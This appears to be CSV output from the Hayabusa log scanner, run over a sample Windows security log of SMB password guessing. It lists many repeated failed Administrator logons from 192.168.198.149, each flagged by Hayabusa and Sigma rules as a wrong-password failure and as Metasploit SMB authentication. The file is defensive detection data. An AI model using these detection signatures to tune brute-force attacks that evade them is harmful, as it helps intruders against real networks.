NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
